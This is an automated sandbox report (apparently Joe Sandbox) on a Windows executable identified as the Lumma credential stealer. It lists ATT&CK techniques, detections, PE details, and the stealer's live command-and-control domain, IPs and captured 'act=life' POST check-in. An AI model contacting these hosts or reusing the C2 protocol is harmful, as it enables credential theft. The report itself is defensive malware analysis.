Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping631
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
Obfuscated Files or Information		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS223
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe100%AviraTR/Crypt.TPM.Gen
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://frogs-severz.sbs/W100%Avira URL Cloudmalware
https://frogs-severz.sbs/api(wWdtP100%Avira URL Cloudmalware
https://frogs-severz.sbs//100%Avira URL Cloudmalware
https://frogs-severz.sbs/api(wl100%Avira URL Cloudmalware
https://frogs-severz.sbs/apiC100%Avira URL Cloudmalware
https://frogs-severz.sbs/apiR100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
frogs-severz.sbs
104.21.88.250
truefalse
    		high
    property-imper.sbs
    		unknown
    		unknownfalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://frogs-severz.sbs/apifalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://frogs-severz.sbs/Wfile.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://crl.microfile.exe, 00000003.00000003.1331160862.0000000001524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1330974839.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://frogs-severz.sbs/file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://frogs-severz.sbs//file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://frogs-severz.sbs/api(wWdtPfile.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://frogs-severz.sbs/apiCfile.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://frogs-severz.sbs/api(wlfile.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://frogs-severz.sbs/apiRfile.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            104.21.88.250
            		frogs-severz.sbsUnited States
            		13335CLOUDFLARENETUSfalse

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1562276
            Start date and time:2024-11-25 12:57:15 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 47s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.evad.winEXE@1/0@2/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: file.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            06:58:16API Interceptor3x Sleep call for process: file.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            104.21.88.250file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
              file.exeGet hashmaliciousLummaC StealerBrowse
                file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                  file.exeGet hashmaliciousLummaC StealerBrowse
                    file.exeGet hashmaliciousUnknownBrowse
                      injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                          b.exeGet hashmaliciousLummaC StealerBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            frogs-severz.sbsfile.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.155.47
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.155.47
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.155.47
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.155.47
                            file.exeGet hashmaliciousUnknownBrowse
                            • 104.21.88.250
                            Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.155.47

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSVendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.206.110
                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.155.47
                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 172.67.145.234
                            http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                            • 104.18.11.207
                            https://protect-us.mimecast.com/s/N4SFCv2zvkHW7wOAuzlFYeGet hashmaliciousUnknownBrowse
                            • 104.19.230.21
                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                            • 104.21.67.152
                            http://propdfhub.comGet hashmaliciousUnknownBrowse
                            • 104.18.30.234
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 172.64.41.3
                            http://taerendil.free.fr/Kzf20FukxrNV0r0Xw3Get hashmaliciousUnknownBrowse
                            • 104.16.40.28

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            IaslcsMo.ps1Get hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.88.250
                            t90RvrDNvz.exeGet hashmaliciousUnknownBrowse
                            • 104.21.88.250
                            docx008.docx.docGet hashmaliciousUnknownBrowse
                            • 104.21.88.250
                            docx002.docx.docGet hashmaliciousUnknownBrowse
                            • 104.21.88.250

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.946753259875961
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'846'784 bytes
                            MD5:1959840f03733001022c3aa78866b3e0
                            SHA1:a6a9800d7009ef076f66deecd050261271d6e3c0
                            SHA256:e38e917a486da4cd7fd65caf9761101feedc4a4d0feb047ad1b14e3423f3e903
                            SHA512:535ed9b7206e61c1b82df577ea48d8a00658349fcc4bd8d02bb4861d324904a333a22d5c4307caf931cb987d107ca1bd8bcb5b6e14553f45b1efbe5843bf0cbd
                            SSDEEP:49152:mWa/+R6/b/B+TuiQUOnCN1l200ihr1WTNfP:mh+A/rBEQ/C1rhr1WTBP
                            TLSH:A7853326AD272698CB314776529BC4EC7FE948AC119E7C8224FC436CF472ED8195B4EC
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................`I...........@...........................I.....(.....@.................................\...p..

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x896000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F35AC808BFAh

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x560000x26200419bc2c5cd2d6ea39762b453ab5daed9False0.9992123463114754data7.97874522345175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x570000x2b00x200f16b3702034c8f07c9e9079cfcc66f28False0.80078125data6.072057428570214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x590000x2a30000x200ece7234ed96622308e95295af5838931unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            izyzjrki0x2fc0000x1990000x19900074e91a66ad5749560e6aeeced9147046False0.9938021708817237data7.952961646719837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            beoowxtj0x4950000x10000x400afb60bb5b6a551abd091b008d03ea48fFalse0.7529296875data6.0175050685404985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x4960000x30000x2200be428c3fc1a535af2e75c1e36541afc9False0.060776654411764705DOS executable (COM)0.7702798642078158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x494c440x256ASCII text, with CRLF line terminators0.5100334448160535

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-25T12:58:19.750219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749706104.21.88.250443TCP
                            2024-11-25T12:58:20.536502+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749706104.21.88.250443TCP
                            2024-11-25T12:58:20.536502+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749706104.21.88.250443TCP
                            2024-11-25T12:58:21.491196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749707104.21.88.250443TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 25, 2024 12:58:18.427442074 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:18.427474022 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:18.427531958 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:18.434767962 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:18.434786081 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:19.750142097 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:19.750219107 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:19.754832983 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:19.754839897 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:19.755062103 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:19.803530931 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:19.811083078 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:19.811129093 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:19.811171055 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:20.536303043 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:20.536380053 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:20.536571026 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:20.538609028 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:20.538609028 CET49706443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:20.538624048 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:20.538634062 CET44349706104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:20.593408108 CET49707443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:20.593451977 CET44349707104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:20.593561888 CET49707443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:20.593925953 CET49707443192.168.2.7104.21.88.250
                            Nov 25, 2024 12:58:20.593946934 CET44349707104.21.88.250192.168.2.7
                            Nov 25, 2024 12:58:21.491195917 CET49707443192.168.2.7104.21.88.250

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 25, 2024 12:58:17.520112991 CET6451753192.168.2.71.1.1.1
                            Nov 25, 2024 12:58:17.831144094 CET53645171.1.1.1192.168.2.7
                            Nov 25, 2024 12:58:17.886907101 CET6307453192.168.2.71.1.1.1
                            Nov 25, 2024 12:58:18.416856050 CET53630741.1.1.1192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 25, 2024 12:58:17.520112991 CET192.168.2.71.1.1.10x57b8Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                            Nov 25, 2024 12:58:17.886907101 CET192.168.2.71.1.1.10xa441Standard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 25, 2024 12:58:17.831144094 CET1.1.1.1192.168.2.70x57b8Name error (3)property-imper.sbsnonenoneA (IP address)IN (0x0001)false
                            Nov 25, 2024 12:58:18.416856050 CET1.1.1.1192.168.2.70xa441No error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                            Nov 25, 2024 12:58:18.416856050 CET1.1.1.1192.168.2.70xa441No error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • frogs-severz.sbs

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749706104.21.88.2504437616C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            2024-11-25 11:58:19 UTC263OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: frogs-severz.sbs
                            2024-11-25 11:58:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
                            2024-11-25 11:58:20 UTC1012INHTTP/1.1 200 OK
                            Date: Mon, 25 Nov 2024 11:58:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=3alqk6vdvn44ubrfkoe8pu7nhu; expires=Fri, 21-Mar-2025 05:44:59 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txefG9O6JwC44UFVELjBd7dY6S%2FXF2I%2F03RWy5T%2B2YtW74h4hsZ0lK%2BgFsNtM9xCwK7WNuMfzSVum4WoNKEIKGCBBIcVFF8WOOjjaxMn29e9gX6ZMao68iEqxvXWl%2FUBty%2BO"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e81775f395e422b-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=613058&cwnd=234&unsent_bytes=0&cid=dac6f95772b3612f&ts=803&x=0"
                            2024-11-25 11:58:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-11-25 11:58:20 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:3
                            Start time:06:58:15
                            Start date:25/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x980000
                            File size:1'846'784 bytes
                            MD5 hash:1959840F03733001022C3AA78866B3E0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:66.7%
                              Total number of Nodes:234
                              Total number of Limit Nodes:14
                              execution_graph 6821 98e0d8 6822 98e100 6821->6822 6824 98e16e 6822->6824 6837 9bdf70 LdrInitializeThunk 6822->6837 6826 98e22e 6824->6826 6838 9bdf70 LdrInitializeThunk 6824->6838 6839 9a5e90 6826->6839 6828 98e29d 6847 9a6190 6828->6847 6830 98e2bd 6857 9a7e20 6830->6857 6834 98e2e6 6877 9a8c90 6834->6877 6836 98e2ef 6837->6824 6838->6826 6840 9a5f30 6839->6840 6840->6840 6841 9a60b5 6840->6841 6842 9a6026 6840->6842 6846 9a6020 6840->6846 6886 9c0f60 6840->6886 6845 9a1790 2 API calls 6841->6845 6880 9a1790 6842->6880 6845->6846 6846->6828 6848 9a619e 6847->6848 6919 9c0b70 6848->6919 6850 9a5fe0 6851 9c0f60 2 API calls 6850->6851 6852 9a6026 6850->6852 6853 9a6020 6850->6853 6854 9a60b5 6850->6854 6851->6850 6855 9a1790 2 API calls 6852->6855 6853->6830 6856 9a1790 2 API calls 6854->6856 6855->6854 6856->6853 6858 9a80a0 6857->6858 6861 9a7e4c 6857->6861 6866 98e2dd 6857->6866 6867 9a80d7 6857->6867 6924 9bded0 6858->6924 6860 9c0f60 2 API calls 6860->6861 6861->6858 6861->6860 6862 9c0b70 LdrInitializeThunk 6861->6862 6861->6866 6861->6867 6862->6861 6863 9c0b70 LdrInitializeThunk 6863->6867 6869 9a8770 6866->6869 6867->6863 6867->6866 6868 9bdf70 LdrInitializeThunk 6867->6868 6928 9c0c80 6867->6928 6936 9c1580 6867->6936 6868->6867 6870 9a87a0 6869->6870 6871 9a882e 6870->6871 6948 9bdf70 LdrInitializeThunk 6870->6948 6873 9bb7e0 RtlAllocateHeap 6871->6873 6876 9a895e 6871->6876 6874 9a88b1 6873->6874 6874->6876 6949 9bdf70 LdrInitializeThunk 6874->6949 6876->6834 6950 9a8cb0 6877->6950 6879 9a8c99 6879->6836 6881 9a17a0 6880->6881 6881->6881 6882 9a183e 6881->6882 6884 9a1861 6881->6884 6894 9c0610 6881->6894 6882->6841 6884->6882 6898 9a3d70 6884->6898 6888 9c0f90 6886->6888 6887 9c0fde 6889 9bb7e0 RtlAllocateHeap 6887->6889 6893 9c10ae 6887->6893 6888->6887 6917 9bdf70 LdrInitializeThunk 6888->6917 6891 9c101f 6889->6891 6891->6893 6918 9bdf70 LdrInitializeThunk 6891->6918 6893->6840 6895 9c0630 6894->6895 6896 9c075e 6895->6896 6910 9bdf70 LdrInitializeThunk 6895->6910 6896->6884 6899 9c0480 LdrInitializeThunk 6898->6899 6900 9a3db0 6899->6900 6905 9a44c3 6900->6905 6911 9bb7e0 6900->6911 6902 9a3dee 6908 9a3e7c 6902->6908 6914 9bdf70 LdrInitializeThunk 6902->6914 6904 9bb7e0 RtlAllocateHeap 6904->6908 6905->6882 6906 9a4427 6906->6905 6916 9bdf70 LdrInitializeThunk 6906->6916 6908->6904 6908->6906 6915 9bdf70 LdrInitializeThunk 6908->6915 6910->6896 6912 9bb800 6911->6912 6912->6912 6913 9bb83f RtlAllocateHeap 6912->6913 6913->6902 6914->6902 6915->6908 6916->6906 6917->6887 6918->6893 6921 9c0b90 6919->6921 6920 9c0c4f 6920->6850 6921->6920 6923 9bdf70 LdrInitializeThunk 6921->6923 6923->6920 6925 9bdf3e 6924->6925 6927 9bdeea 6924->6927 6926 9bb7e0 RtlAllocateHeap 6925->6926 6926->6927 6927->6867 6929 9c0cb0 6928->6929 6930 9c0cfe 6929->6930 6944 9bdf70 LdrInitializeThunk 6929->6944 6932 9bb7e0 RtlAllocateHeap 6930->6932 6933 9c0e0f 6930->6933 6934 9c0d8b 6932->6934 6933->6867 6934->6933 6945 9bdf70 LdrInitializeThunk 6934->6945 6938 9c1591 6936->6938 6937 9c163e 6939 9bb7e0 RtlAllocateHeap 6937->6939 6942 9c17de 6937->6942 6938->6937 6946 9bdf70 LdrInitializeThunk 6938->6946 6941 9c16ae 6939->6941 6941->6942 6947 9bdf70 LdrInitializeThunk 6941->6947 6942->6867 6944->6930 6945->6933 6946->6937 6947->6942 6948->6871 6949->6876 6951 9a8d10 6950->6951 6951->6951 6960 9bb8e0 6951->6960 6953 9a8d6d 6953->6879 6955 9a8d45 6955->6953 6958 9a8e66 6955->6958 6968 9bbb20 6955->6968 6972 9bc040 6955->6972 6959 9a8ece 6958->6959 6980 9bbfa0 6958->6980 6959->6879 6961 9bb900 6960->6961 6962 9bb93e 6961->6962 6984 9bdf70 LdrInitializeThunk 6961->6984 6964 9bb7e0 RtlAllocateHeap 6962->6964 6965 9bba1f 6962->6965 6966 9bb9c5 6964->6966 6965->6955 6966->6965 6985 9bdf70 LdrInitializeThunk 6966->6985 6969 9bbbce 6968->6969 6970 9bbb31 6968->6970 6969->6955 6970->6969 6986 9bdf70 LdrInitializeThunk 6970->6986 6974 9bc090 6972->6974 6973 9bc73e 6973->6955 6979 9bc0d8 6974->6979 6987 9bdf70 LdrInitializeThunk 6974->6987 6976 9bc6cf 6976->6973 6988 9bdf70 LdrInitializeThunk 6976->6988 6978 9bdf70 LdrInitializeThunk 6978->6979 6979->6973 6979->6976 6979->6978 6979->6979 6982 9bbfc0 6980->6982 6981 9bc00e 6981->6958 6982->6981 6989 9bdf70 LdrInitializeThunk 6982->6989 6984->6962 6985->6965 6986->6969 6987->6979 6988->6973 6989->6981 7009 98e970 7010 98e8b8 7009->7010 7012 98e948 7010->7012 7013 9bdf70 LdrInitializeThunk 7010->7013 7012->7012 7013->7012 7006 999130 7007 9bb8e0 2 API calls 7006->7007 7008 999158 7007->7008 7050 99db30 7051 99db70 7050->7051 7052 98b210 RtlAllocateHeap 7051->7052 7053 